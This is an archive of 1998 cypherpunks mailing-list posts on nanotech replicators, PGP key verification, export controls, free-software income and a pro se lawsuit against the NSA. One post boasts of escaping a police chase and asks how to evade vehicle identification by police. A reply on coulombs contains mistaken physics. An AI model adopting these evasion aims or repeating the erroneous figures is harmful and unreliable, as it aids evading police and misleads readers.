Message-ID: <l03020900b0e632bf839b@[209.130.130.160]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>I think people here seriously underestimate how long nanotech will take.
>Suppose you have a machine which takes atoms and deposits them onto a
>surface, building it up layer by layer.  This is possible with today's
>technology, but it's a slow process.

I don't think it's that far away.  Decades (or at least
years) ago, the US Navy developed a laser so focused and
controlled it could write messages on one face of a cube
of salt.

Best wishes and fresh-roasted peanut taste,
The Sheriff. -- ***<REPLY TO: sheriff@speakeasy.org>***
- ---
As kinky as it sounds, finger me to see my PGP key and
confirm the signature attached to this message.  Either
that, or head for pgp.ai.mit.edu on the WWW and search
for my e-mail address.
- ---
Any and all SPAM will be met with immediate prosecutory
efforts.  Solicitations are NOT welcome here!
- ---
        ----BEGIN INFLAMATORY BLOCK----
Version: 160 (IQ)
Comments: Definitely one of their greatest misses.

Reporter: "Do you know what Public Enemy is?"
- ---
Citizen: "Public enemy?"
          [long pause]
         "Probably somebody in office."
        -----END INFLAMATORY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use <http://www.pgp.com>
Charset: noconv

iQEVAwUBNMDw1ABMw4+NR29ZAQEZPwf+Nscubdhe+0M0SxQTwXqWz4u8Wv9YbxvI
o1MV1MFxy5f2fCjiNglBYzW6VWMBg2Xz+WPsUOhcdiUMiF0UGyhgwg9dfIE5HXxR
/8QWSlhQaio2Qt+uw5a18h74qjKca2jvWTKxYhgBU6p8B8W0FlGemvJVPe0lR1cD
hKylwlqrAX9f/ofi9RZODEL/7RIHR2bgEqDrRoO29Lu9Wgyj+FoV1ZTBV0IOZnc0
O8y5xsjkzazZoC0dhwkUk2aTn5qQoSA6djhefUuCsmRlYg81NdWHa4375UgXw5ji
XHNDFK7mNsAgIvE7StGkr2eCkaSLkep+R4OF5vADYvALvfA0H67yMw==
=p4aS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Sun, 18 Jan 1998 03:01:14 +0800
To: cypherpunks@toad.com
Subject: Re: I'm going to count to ten...
In-Reply-To: <199801162225.XAA28511@basement.replay.com>
Message-ID: <l03020901b0e633079465@[209.130.130.160]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>TruthMonger wrote:
>>  I also sent a letter a few weeks ago to Ted Kaczynski, offering to
>>carry on his work while he is incarcerated. I got a letter back from
>>him today, but I'm afraid to open it...
>
>TM,
>Do us all a favor--open the letter!

Yeah, and forward to the list the entire contents.
I wanna see what this guy has to say.  He'll prolly
condem you as a fake for using the technology of
the US Postal Service to contact him, or something.

Best wishes and fresh-roasted peanut taste,
The Sheriff. -- ***<REPLY TO: sheriff@speakeasy.org>***
- ---
As kinky as it sounds, finger me to see my PGP key and
confirm the signature attached to this message.  Either
that, or head for pgp.ai.mit.edu on the WWW and search
for my e-mail address.
- ---
Any and all SPAM will be met with immediate prosecutory
efforts.  Solicitations are NOT welcome here!
- ---
        ----BEGIN INFLAMATORY BLOCK----
Version: 160 (IQ)
Comments: Definitely one of their greatest misses.

Reporter: "Do you know what Public Enemy is?"
- ---
Citizen: "Public enemy?"
          [long pause]
         "Probably somebody in office."
        -----END INFLAMATORY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use <http://www.pgp.com>
Charset: noconv

iQEVAwUBNMDw3wBMw4+NR29ZAQEPZQf9GxMXfbABz1r4quv9U+oJvMLjAL9PWS79
j3mCZIo7rR5yFPM3h/l89sseilpeNA9Rgnim1CaoS0WXmKBOsvy3xV8vXNdKxlTU
s2Q2wLZFXF1sXxL8aDNgKzVVRBtR+Ayqd+j5yT5aGOloglXopaECxp44IH3GCMbg
Jn2YwRNKOgHop3pwD7kAWqbisjH9EhBje1i7NpJ9FsgOqCKknDkI56O2GxW1ArVo
cvlYdrWlXObwIQnZKxAtFyz6NHI57Aes5vvMeDIlVGBRsDxT/ziD08uB044vYCeS
YVNgjL9rRpAg5H8/VmaDy56Y65ok9FSS74Lg0IWFCtSqRmXmgug/cQ==
=F3Ts
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Sun, 18 Jan 1998 03:02:19 +0800
To: cypherpunks@toad.com
Subject: Re: I'm going to count to ten... etc
In-Reply-To: <004b01bd22ce$7c76a6c0$ab8588d1@justice>
Message-ID: <l03020902b0e6352e15e7@[209.130.130.160]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

>And the solution to the speeding-ticket-giving
>camera is, of course, camo paint jobs.  But
>you all knew that, right?

I've allways found myself in a rather precarious
position, when it comes to identifiable my car is.
When I frequent a location (coffee house, restaurant)
more than once, people suddenly recognize me because
of the artwork on my car -- a mural of an oriental
dragon painted on the driver's side, and a blue-n-
black phoenix-in-progress on the passanger side.

Obviously, this makes it easy for law enforcement
officers to identify me after clocking me.  I remem-
ber my first (and last, as far as I'M concerned)
police chase, when I was trying to catch up with a
pal who I had to meet, who I spotted heading south
while I was heading north on a particular superhighway.
A cop flew past going north after I turned around,
screamed through the midway, and flipped on his
lights.  I escaped, amazingly.

I don't want to paint my car camo, because even
though the murals were free (a la my adopted little
brother), they took time and hold sentimental value
(not to mention the fact that they turn a borning
commuter hotrod into something I don't have to use
the license plate to identify in a parking lot).  Is
there any other way to circumvent visual aquisition
and identification of my vechicle?

Besides a Klingon cloaking device, of course.

Best wishes and fresh-roasted peanut taste,
The Sheriff. -- ***<REPLY TO: sheriff@speakeasy.org>***
- ---
As kinky as it sounds, finger me to see my PGP key and
confirm the signature attached to this message.  Either
that, or head for pgp.ai.mit.edu on the WWW and search
for my e-mail address.
- ---
Any and all SPAM will be met with immediate prosecutory
efforts.  Solicitations are NOT welcome here!
- ---
        ----BEGIN INFLAMATORY BLOCK----
Version: 160 (IQ)
Comments: Definitely one of their greatest misses.

Reporter: "Do you know what Public Enemy is?"
- ---
Citizen: "Public enemy?"
          [long pause]
         "Probably somebody in office."
        -----END INFLAMATORY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use <http://www.pgp.com>
Charset: noconv

iQEVAwUBNMDw6QBMw4+NR29ZAQHgnQf/fqbCxx6e/ajr8yjmi/ZLlipDcPhmauTh
bgDk11a1t4qzDcRyw76QdugTbFyijnlVrbjyBw+1o2pBRkHohcMfhUieXBiMWGvN
mfDunesShQfGZaCO5dXoih9SIEqQnsby4cxvVHX3DfvC/OZ7lM92FWSDjz7kYDPP
nc3wG3gdZcBZnmx0LlYRZq0d9g8XZ/6pG+qFRl8UJY3tBoaTS4J7VHgKlFsVVROZ
247nNFtER3T/9U1pS4B+8eq/ebqvrjZHGdVJuCvl2k9u5oP1BgMMEJ/rnztVWSfX
Inhzb4jk9r1ew0PUUafnn4U+MBc5dQh0PX1Ny32w8a65BAsedA/PWA==
=urQZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 17 Jan 1998 21:38:57 +0800
To: igor@Algebra.COM (Igor)
Subject: Re: Deriving economic profits from writing FREE software?
In-Reply-To: <slrn6c0bra.sic.igor@manifold.algebra.com>
Message-ID: <199801171351.IAA05548@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <slrn6c0bra.sic.igor@manifold.algebra.com>, on 01/16/98 
   at 10:11 PM, igor@algebra.com (Igor) said:

>Hi,

>At my leisure, I write free software. One of these programs is the usenet
>moderation bot STUMP. Right now I am writing another free program. I feel
>perfectly comfortable with the idea that I will not CHARGE money for
>these programs; for one, I am a beneficiary of a multitude of excellent
>free programs written by others, and just as well i realize that selling
>them  would be more of a hassle than it is worth.

>My another pet idea is that programming is poetry, and therefore a person
>who only writes commercial software is almost surely going to lose
>whatever gift in programming that he had from God.

>However, aside from the psychic benefits, I would like to somehow derive
>an economic profit from being a freeware author. So far, I feel that the
>status of the author of a popular package does sound good on a resume,
>but it is as far as I could get.

>Does anyone else feel the same way? Has anybody come up with a way to 
>cash in on the free programs that he writes? 

Not much. Biggest boost from writting free software (other than the fact
of having the software) is to one's reputation capital. If one was
intrested in entering into a new field of programming (commercially)
having a few programs under one's belt never hurts.

Shareware is not a bad alternative. Thoses who like your programs and are
intrested in supporting your efforts are usally willing to spend a couple
of bucks. I wouldn't plan on quitting your day job but if your code is
popular it can help offset expences.

Another approach is to do what Phil did with PGP. Freeware to individules
and pay for business use. This depends on whether there is a business need
for your programs or not.

Get a job at a University. :)

If you really had somthing intresting that you were planning on doing you
may be able to get some type of research grant.

I think that you find that most freeware/shareware authors hold down a 9
to 5 job to pay the bills and write their code on the side.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: If at first you don't succeed, work for Microsoft.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMCl649Co1n+aLhhAQGlvgP/dNtLV0A/qvzZZrXHYrNbqW3iAbRLPcbt
ZyQuW0LHKr750o0cAiLW54O+h/3OtnA2BOLejuDoEnipkOY3QCrAshUCeWQoZw71
viw4hzhDIrXk/T6rhHM7y/GfLY8aYyNQ3pCK+Tb/L+uIxWakufPW0DimsMYgyA0K
PNwHJGYgEro=
=uCx1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sat, 17 Jan 1998 16:34:14 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Microsoft Metaphors
Message-ID: <199801170825.JAA23714@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




> > What are the best metaphors to use when talking about a browser
> > and an operating system? Is the combination like a car and an
> > engine, or a car and a roofrack? A pair of gloves?
>
>In this specific case it's more like garbage in a trash can.

Nah. In this specific case it's more like shit and a toilet. Or if you
wanted to get a bit obscure you could say that Windows is like LSD. It kills
brain cells, attracts the really stupid in addition to the occasional
person with a clue, and the typical user has random flashbacks when put in
front of any computer at all. It has no useful purpose beyond making the
user feel really good, costs a lot, and is dangerous to your (mental)
health. It's produced, handled, and sold by a huge cartel (Microsoft) who
shoots (runs out of business) anybody who opposes them. Those the cartel
doesn't shoot they bribe (buy). And users enter into temporary or in some
cases permanent fits of stupidity and hysteria during which they are a
danger to anyone around them, particularly if they're armed (have a bulk
mailer or platform-specific "web authoring tools" which produce crappy HTML). 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 18 Jan 1998 02:47:26 +0800
To: jya@pipeline.com
Subject: Re: New Software Controls
In-Reply-To: <1.5.4.32.19980117020259.00733f54@pop.pipeline.com>
Message-ID: <199801171025.KAA00273@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




[ObNote: the cypherpunks list is not at toad.com]

John Young <jya@pipeline.com> information terrorist writes:
> TH points out that there's a broad new provision in the
> BXA Wassenaar rule for controlling telecommunications
> software under Category 5, Part I - Telecommunications, 
> quote:
> 
>    You might want to highlight the following section ... not sure of the 
>    entire context ... but this isn't something that I'd seen before. It looks
>    like control of any software that can transmit data.
> 
>        c.3. ``Software'' which provides the capability of recovering
>        ``source code'' of telecommunications ``software'' controlled by
>        5A001, 5B001, or 5C001;

Export ban on decompilers?  Disassemblers?  Debuggers?

These tools are general purpose, so this seems particularly weird.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0181.myriad.ml.org (Matthew Ghio)
Date: Sun, 18 Jan 1998 00:49:10 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Nanotechnology
In-Reply-To: <199801162110.WAA17429@basement.replay.com>
Message-ID: <199801171645.LAA01243@myriad>
MIME-Version: 1.0
Content-Type: text/plain



nobody@replay.com (Anonymous) wrote:

> I think people here seriously underestimate how long nanotech will take.
> Suppose you have a machine which takes atoms and deposits them onto a
> surface, building it up layer by layer.  This is possible with today's
> technology, but it's a slow process.
> 
> Consider this: If someone builds a replicator which takes a week to make
> a copy of itself, every person on this entire planet could have one within
> eight months.  Think about it.


Let's consider a rough estimate of whether this could actually work.

Suppose you have a desktop fab with an ion gun that can put out 1 amp of
current, housed in a 10-centimeter cube, and you want to build another
cube.  Assuming an average ionization energy of 10 eV and supposing this
achieved an energy efficiency of 10% that'd be 100 watts.

1 coulomb/second = 6.24 x 10^18 atoms/sec.  Assuming an atomic spacing
of roughly 10^-10 meters, at that rate it'd take you about 18.5 days to
construct one side of the cube with a thickness of 1mm, or almost four
months to build another cube.  I'd guesstimate another 4 months to build
the electronics for it.  And then you'd need some way to assemble the
pieces.

So roughly 8 months just to build one copy, rather than to achieve world
domination. :)

Still, unless I'm way off on these estimates, it's within the right
ballpark.  If the cubes were 1 cm, you could make copies in less than a
day, assuming it didn't get too hot at that power level.  Just figure
out how you're going to feed the electricity and raw materials into all
those little things...

This sort of replicator is not what is usually considered nanotechnology,
but if it actually worked, such a device could become quite popular.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Sun, 18 Jan 1998 04:56:23 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: how to release code if the programmer is a target for (fwd)
In-Reply-To: <199801162348.RAA12709@einstein.ssz.com>
Message-ID: <3.0.3.32.19980117121208.006bc254@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 05:48 PM 1/16/98 -0600, Jim Choate wrote:
>Forwarded message:
>
>> Date: Fri, 16 Jan 1998 12:29:34 -0800
>> From: Jonathan Wienke <JonWienk@ix.netcom.com>
>> Subject: Re: how to release code if the programmer is a target for
>>   coercion (fwd)
>
>[my entire previous post deleted...geesh]
>
>> Jim, there are > 2 parties in the matter being discussed:
>
>EXACTLY. That is why there is a potential for a MITM (requires at least
>3 parties) attack.
>
>> My key is publicly available at the MIT keyserver; it has been since PGP
>> 5.0 came out.
>
>So what? If Alice is being monitored for whatever reason and she requests
>your key Mallet simply intercedes and inserts their own key. How is Alice
>going to catch a clue?
>
>> key.  It would be fairly difficult for any attacker to forge a signature
>> with a false key;
>
>It isn't the source but the recipient that is under attack.
>
>[rest deleted]

However, if Alice has had my key for 6 months, and has verified the
signatures on 100 of my Cypherpunks posts, and my signature on GunzenBombs
Pyro-Technologies latest checks out, she can be pretty confident that I
actually signed it.  On the other hand, if she didn't already have it, and
got a fake key and document from Mallet, Alice would not be able to use the
fake key to verify the signatures on my prior Cypherpunks posts.  This
ought to be a red-flagged clue that something is rotten in Denmark...

-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNMEQlsJF0kXqpw3MEQJA8ACeMcERuFEawbrfZBqBUCVIiCSy5CcAn0VU
nsPmpqLqwenGnvgCYjyg3pdQ
=7VZu
-----END PGP SIGNATURE-----


Jonathan Wienke

PGP Key Fingerprints:
7484 2FB7 7588 ACD1  3A8F 778A 7407 2928
3312 6597 8258 9A9E D9FA  4878 C245 D245 EAA7 0DCC

"If ye love wealth greater than liberty, the tranquility of servitude
greater than the animating contest for freedom, go home from us in peace.
We seek not your counsel, nor your arms. Crouch down and lick the hand that
feeds you. May your chains set lightly upon you; and may posterity forget
that ye were our countrymen."
-- Samuel Adams

"Stupidity is the one arena of of human achievement where most people
fulfill their potential."
-- Jonathan Wienke

Never sign a contract that contains the phrase "first-born child."

When the government fears the people there is liberty.
When the people fear the government there is tyranny.
Those who live by the sword get shot by those who don't. 

RSA export-o-matic:
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 18 Jan 1998 04:37:03 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Nanotechnology (fwd)
Message-ID: <199801172105.PAA15527@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 17 Jan 1998 21:22:59 +0100 (MET)
> Subject: Re: Nanotechnology
> From: nobody@REPLAY.COM (Anonymous)

> > 1 coulomb/second = 6.24 x 10^18 atoms/sec.

There are a couple of things incorrect with this.

A Coulomb is 1N of e-/s, not atoms. N atoms is called a Mole.

N, or Avagadro's Number, is 6.023E23 not 6.24E18


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 18 Jan 1998 05:05:49 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: how to release code if the programmer is a target for (fwd)
Message-ID: <199801172136.PAA15663@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 17 Jan 1998 12:12:08 -0800
> From: Jonathan Wienke <JonWienk@ix.netcom.com>
> Subject: Re: how to release code if the programmer is a target for (fwd)

> However, if Alice has had my key for 6 months, and has verified the
> signatures on 100 of my Cypherpunks posts, and my signature on GunzenBombs
> Pyro-Technologies latest checks out, she can be pretty confident that I
> actually signed it.  On the other hand, if she didn't already have it, and
> got a fake key and document from Mallet, Alice would not be able to use the
> fake key to verify the signatures on my prior Cypherpunks posts.  This
> ought to be a red-flagged clue that something is rotten in Denmark...

That's all fine and dandy, however, we *are* talking about an eternity server
architecture that delivers documents to an end user in a secure manner on
demand with no mechanism, by design, to determine the original source. In
this case there would by definition be *no* history to verify against.

It is in fact this lack of history from the users perspective that causes
the authenticity problem in the first place. Further, a point that seems
to have been forgotten, we are talking about signed and not encrypted
documents. Of course there are some similar problems if we do include the
encryption of the data itself into the protocol.



    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|




    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 18 Jan 1998 07:22:01 +0800
To: jy@jya.com
Subject: REPLY to Mitchells RESPONSE.
Message-ID: <34C13576.4F54@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Saturday 1/17/98 3:37 PM

John Young

Attached is our REPLY to Mitchell's RESPONSE.

Morales will have it filed on Tuesday.  Monday
is MLK day.

Morales will send a FILED stamped copy to you.

Later
bill


		 UNITED STATES DISTRICT COURT
           FOR THE DISTRICT OF NEW MEXICO


William H. Payne        	   	            )
Arthur R. Morales                           )
                                            )
                Plaintiffs,                 )
                                            )
v                                           )	CIV NO 97 0266 
					                 )	SC/DJS
			                            )
Lieutenant General Kenneth A. Minihan, USAF )
Director, National Security Agency	       )
National Security Agency		            )
                                            )
                Defendant                   )


  REPLY TO DEFENDANT'S RESPONSE TO PLAINTIFFS' MOTION FOR 
  SUMMARY JUDGMENT BASED ON EVIDENCE FROM ADMISSIONS

1  COMES NOW plaintiffs Payne [Payne] and Morales [Morales] 

[Plaintiffs], pro se litigants to exercise their rights 

guaranteed under the Constitution, Rules of Civil  Procedure, 

and Local Civil Rules to respond to Defendant's MOTION filed

on 98 JAN-5 within the 14 days allowed by local rule 7.3(b)(4).

2  US Attorney Mitchell [Mitchell]  writes,

  Counsel for Defendant was not served with copies of any of  
  said Requests for Admissions until sometime after the
  individuals had been served.2

Mitchell WAS SERVED

  PLAINTIFFS' FIRST SET OF REQUEST FOR ADMISSION  TO  
  NSA DIRECTOR KENNETH MINIHAN 

  I HEREBY CERTIFY that a copy of the foregoing request for   
  admissions was mailed to Jan Elizabeth Mitchell, Assistant US 
  Attorney, 525 Silver SW, ABQ, NM 87102 this  Monday November 
  3, 1997. 

Michell was not served with any other admissions since

Mitchell is not representing others.

Plaintiffs' served Defendant Minihan properly.  And Minihan

failed to respond to Minihan's admissions within the time

allotted by law.

3 US Attorney Mitchell writes,

  As grounds for the Motion and Memorandum, Defendant
  argued that Plaintiffs had blatantly disregarded this Court's   
  Order pertaining to the conduct of discovery and the deadline 
  for discovery in this Freedom of Information Act action.

Judges Svet and Campos willfully violated Plaintiffs' right

to Discovery.  And thereby earned criminal complaint affidavits

filed with judge Scalia of the Supreme Court.


4 US Attorney Mitchell writes,

  In Defendant's Motion and Memorandum, Counsel for Defendant 
  also objected to Plaintiffs' sua sponte decision to
  modify the Court's June 11 Order to reflect the delay of the
  Court's October 7 Order and the establishment, without leave   
  of this Court, of new deadlines for discovery, motions   
  practice, and the filing of the PreTrial Order. (Motion and   
  Memorandum  9, at 4.)

Judge Svet and Campos attempt to deny Plaintiffs' right to 

Discovery, again, earned Svet and Campos criminal complaint

affidavits.

Plaintiffs exercise their right under the Federal Rules of 

Civil Procedure and the Constitution to conduct Discovery

WITHOUT LEAVE OF COURT!

5 US Attorney Mitchell writes,

   By their own request, Plaintiffs sought to stay a ruling on 
  the Defendant's Motion and Memorandum. Absent any ruling on 
  either the Motion and Memorandum or Plaintiffs' Response,
  Defendant Minihan, employees of NSA, and employees of 
  Sandia National Laboratory, were not obligated to respond to 
  the Requests for Admissions as provided by Fed.R.Civ.P. 36.3 
  For Plaintiffs to now assert in their "Motion for Summary 
  Judgment On Based On Evidence From Admissions" that because   
  the individuals have not responded to the Requests for 
  Admissions they are deemed admitted, flies in the face of   
  their own prayer to this Court to stay a ruling on the 
  Defendant's Motion to strike the Requests for Admissions until 
  the Supreme Court takes action.

Plaintiffs' have REPEATEDLY asked judge Svet and Campos to

disqualify themselves from any rulings on this case because

Campos and Svet do NOT obey the Federal Rules of Civil 

Procedure.

  Replace judges Svet and Campos because these judges
  have demonstrated, IN WRITING, they do not follow the 
  Federal Rules of Civil Procedure.

Plaintiffs' pleas are directed a replacement judge[s].  Not

Svet and Campos.

Therefore, Svet and Campos' failure to remove themselves does 

not stop the legal process. 

Mitchell cites NO law to support her claim that time 

constraints imposed under Fed.R.Civ.P. 36.3 are inapplicable

as a result of Svet's and Campos' failure to remove themselves.

6 US Attorney Mitchell writes,

  Defendant requests that this Court either rule upon
  Defendant's Motion and Memorandum granting the request to   
  strike the Requests for Admissions, or grant Plaintiffs' 
  request to stay this action pending the issuance of the order 
  sought by Plaintiffs in another forum. Should this Court deny 
  Defendant's Motion and Memorandum, Defendant respectfully 
  requests that the individuals to whom Requests for Admissions 
  are appropriate in this action be given the thirty days to 
  respond to said admissions as provided by the Federal Rules of 
  Civil Procedure.

REPLACEMENT JUDGES of the Court should realize the outcome

of the lawsuit has attained international interest as a result

of the

  1  bungled NSA spy sting on Iran 
  2  US government agencies NSA, NIST, and the FBI's
     attempt to control cryptography.

Mitchell's 
  
  DEFENDANT'S RESPONSE TO PLAINTIFFS' MOTION FOR 
  SUMMARY JUDGMENT BASED ON EVIDENCE FROM ADMISSIONS

was posted on Internet at jya.com, click cryptome

  nsasuit8.htm  USA/NSA Responds to Payne/Morales Motion            
                January 16, 1998

Importance of this posting is summed-up in the Toronto Sun, 

Jan. 11, 1998

  US, Iran Need Each Other 
 
  by Eric Margolis 
 
  Iran launched a surprise charm offensive last week, 
  throwing Washington into serious confusion.  

  In a lengthy interview on CNN, Iran's new president, Mohammad   
  Khatami, skillfully analyzed the bitter relations between the   
  two nations and cautiously extended an olive branch to 
  Washington, calling for an end to their 19-year cold war. 
 
  Khatami's diplomatic ju-jitsu flummoxed the Clinton   
  administration, which was busy trying to rally international 
  support against Tehran - and to overthrow Iran's elected 
  government.  
 
  Both capitals are split over the question of relations.  

  In Washington, the military establishment and conservative   
  Republicans have inflated Iran into a bogeyman to 
  justify military budgets and keep U.S. forces in the Mideast.  
  ...

  America incited Iraq to invade Iran in 1980. They did this to 
  crush the Islamic revolution, then provided massive war aid to 
  Saddam Hussein. Half a million Iranians died.  
 
The US got caught involved in genocide.  Using high tech.

This is one subject of this lawsuit.

Albuquerque Journal Tuesday 1/13/98 carried the editorial.
  
  Khatami Move Is Profile in Courage
  Richard Reeves
  Syndicated Columnist

  LOS ANGELES -  If an American leader had done what
  Iranian President Mohammed Khatami did last Wednesday,
  it would have been hailed as a profile in courage. ...

  Miscalculation!  We armed and pampered Saddam Hussein in
  the hope that Iraq would destroy Iran.  Now that's policy and
  behavior to think about. Here is something to think about: If
  Presidents Eisenhower and Kennedy had pursued any kind of
  sensible policy toward Cuba and Fidel Castro - opposed to
  the policy of trying to assassinate him - there never would 
  have been a Cuban missile crisis.

    I think Iranians have financed and encouraged terrorism
  against the interests of the United States and Israel.  I   
  would not be surprised at all if something like proof emerges 
  soon, perhaps anonymously, from the CIA and other government 
  agencies, where many officials have built their careers on 
  sanctioning and isolating Iran, to try to straighten the 
  backbones of the president and people of the United States.

    If they succeed, America fails.  What would be more 
  effective in closing down Iranian terrorism?  More hostility, 
  sanctions and charges?  Or beginning the process toward more 
  normal relations with a country positioned and born to be   
  great? ...

Clearly genocide fits into

  Now that's policy and behavior to think about.

The wired world is watching what this Court, hopefully

minus judges Svet and Campos, will do.

What is there to be?  A series of possibly unfortunate

events?  

Or does this Court order release the lawfully requested 

documents to help settle this American tragedy?


WHEREFORE.

7 Have replacement judges of this Court DENY Mitchell's

  Plaintiffs requested a stay. Absent a ruling from
  this Court denying their request, they cannot proceed to 
  assert that the Requests for Admissions are deemed admitted. 
  Accordingly, Plaintiffs' "Motion For Summary Judgment On Based 
  On Evidence From Admissions" must be denied.

for reason that Mitchell's request to subvert both the Discovery

processes and its time limits have no basis in law.  And appears 

to plead to judges who do not obey the Federal Rules of Civil

Procedure.

9  IMMEDIATELY ORDER Defendant to release the requested 

documents in the interest of national safety so that this 

matter can be settled. 

Aggrieved victims of  US genocide are reading these pleadings.

                    Respectfully submitted, 
 
 
                    _________________________ 
                    William H. Payne             	   	     
                    13015 Calle de Sandias NE          	     
                    Albuquerque, NM 87111              	     
 
 
                    _________________________				 
                    Arthur R. Morales                            
                    1024 Los Arboles NW                         
                    Albuquerque, NM 87107                        
 
                    Pro se litigants 
 
 
CERTIFICATE OF SERVICE 
 
I HEREBY CERTIFY that a copy of the foregoing memorandum
was mailed to Lieutenant General Kenneth A. Minihan, USAF, 
Director,  National Security Agency, National Security Agency, 
9800 Savage Road, Fort George G. Meade, MD 20755-6000 
and hand delivered to  John J. Kelly, US Attorney, 525 Silver 
SW, ABQ, NM 87102 this  Tuesday January 20, 1997. 




5






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@temp0183.myriad.ml.org (Matthew Ghio)
Date: Sun, 18 Jan 1998 05:18:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Nanotechnology
In-Reply-To: <199801172022.VAA15751@basement.replay.com>
Message-ID: <199801172114.QAA08494@myriad>
MIME-Version: 1.0
Content-Type: text/plain



nobody@replay.com (Anonymous) wrote:

> ok, but how do you build a 10-cm cube inside of a 10-cm cube? :)
> 

Rotate the six faces of the cube so that the squares fit inside, and then
unfold it when you're done.  Possibly you could build two cubes at once,
then have the cube break open and the two 'babies' come out.

I think the toughest thing would be to maintain vacuum inside after you
assemble the new cubes.  Maybe you could launch them out of the atmosphere
instead - It'd be a cheap way to build a lunar colony. :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Sun, 18 Jan 1998 01:27:41 +0800
To: cypherpunks@toad.com
Subject: Locating radio receivers
In-Reply-To: <19980116220255.3116.qmail@nym.alias.net>
Message-ID: <E0xtbs7-0004Rk-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
